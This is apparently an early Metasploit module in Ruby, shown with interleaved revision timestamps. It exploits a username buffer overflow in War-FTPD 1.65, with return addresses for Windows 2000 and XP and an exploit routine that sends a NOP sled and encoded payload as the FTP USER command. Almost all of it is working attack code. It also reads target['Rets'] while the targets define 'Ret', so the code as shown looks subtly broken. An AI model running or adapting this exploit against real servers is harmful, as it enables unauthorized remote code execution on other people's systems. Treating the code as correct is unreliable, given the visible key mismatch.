2005-11-11 02:22:03 +01:00
|
|
|
require 'msf/core/exploit/ftp'
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
|
2005-11-24 04:01:27 +01:00
|
|
|
class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote
|
2005-11-11 02:22:03 +01:00
|
|
|
|
|
|
|
include Exploit::Remote::Ftp
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2005-11-24 04:46:53 +01:00
|
|
|
'Name' => 'War-FTPD 1.65 Username Overflow',
|
2005-11-11 02:22:03 +01:00
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a buffer overflow found in the USER command
|
|
|
|
in War-FTPD 1.65.
|
|
|
|
},
|
2005-11-13 19:35:44 +01:00
|
|
|
'Author' => 'Fairuzan Roslan <riaf [at] mysec.org>',
|
2005-11-11 02:22:03 +01:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'OSVDB', '875' ],
|
|
|
|
[ 'MIL', '75' ],
|
|
|
|
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process'
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 424,
|
|
|
|
'BadChars' => "\x00\x0a\x0d\x40",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'ConnectionType' => "-find"
|
|
|
|
}
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# Target 0
|
|
|
|
[
|
|
|
|
'Windows 2000 SP0-SP4 English',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x750231e2 # ws2help.dll
|
|
|
|
},
|
|
|
|
],
|
|
|
|
# Target 1
|
|
|
|
[
|
|
|
|
'Windows XP SP0-SP1 English',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x71ab1d54 # push esp, ret
|
|
|
|
}
|
|
|
|
],
|
|
|
|
# Target 2
|
|
|
|
[
|
|
|
|
'Windows XP SP2 English',
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Ret' => 0x71ab9372 # push esp, ret
|
|
|
|
}
|
|
|
|
]
|
2005-11-11 02:50:05 +01:00
|
|
|
]))
|
2005-11-11 02:22:03 +01:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
connect
|
|
|
|
|
|
|
|
print_status("Trying target #{target.name}...")
|
|
|
|
|
|
|
|
buf = make_nops(600) + payload.encoded
|
2005-11-24 04:46:53 +01:00
|
|
|
buf[485, 4] = [ target['Rets'][0] ].pack('V')
|
2005-11-11 02:22:03 +01:00
|
|
|
|
|
|
|
send_user(buf)
|
|
|
|
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
handler
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|